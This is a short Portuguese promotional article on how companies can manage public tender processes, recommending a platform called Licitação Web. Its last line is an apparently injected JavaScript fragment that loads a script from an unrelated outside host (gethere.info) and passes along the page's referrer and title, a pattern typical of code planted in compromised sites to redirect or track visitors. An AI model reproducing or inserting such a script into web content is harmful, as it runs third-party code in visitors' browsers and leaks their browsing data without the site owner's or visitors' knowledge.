Como gerenciar um processo licitatório

como_gerenciar_processo_licitatorio

Participar de uma licitação pública não é tão simples como possa parecer. É preciso que a empresa cumpra uma série de passos em uma caminhada técnica que vai desde o monitoramento de editais até mesmo a prestaçào do serviço contratado. Tudo deve ser gerenciado com a maior precisão, rigor e controle de qualidade.
É preciso ter domínio sobre um workflow de tarefas, guiando a equipe pelos nos processos burocráticos das licitações, para que nenhuma etapa seja prejudicada.

A maneira mais segura de gerenciar licitações é utilizar uma plataforma dedicada, como a Licitação Web,por exemplo. Através dela, a empresa terá acesso a todas as informações relacionadas a licitações públicas, interligando pessoas e atividades a procedimentos jurídicos e administrativos.
Com isso, tem à disposição soluções que organizam, facilitam e qualificam a venda para o maior comprador do país: o setor público.

acesse a licitação web

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;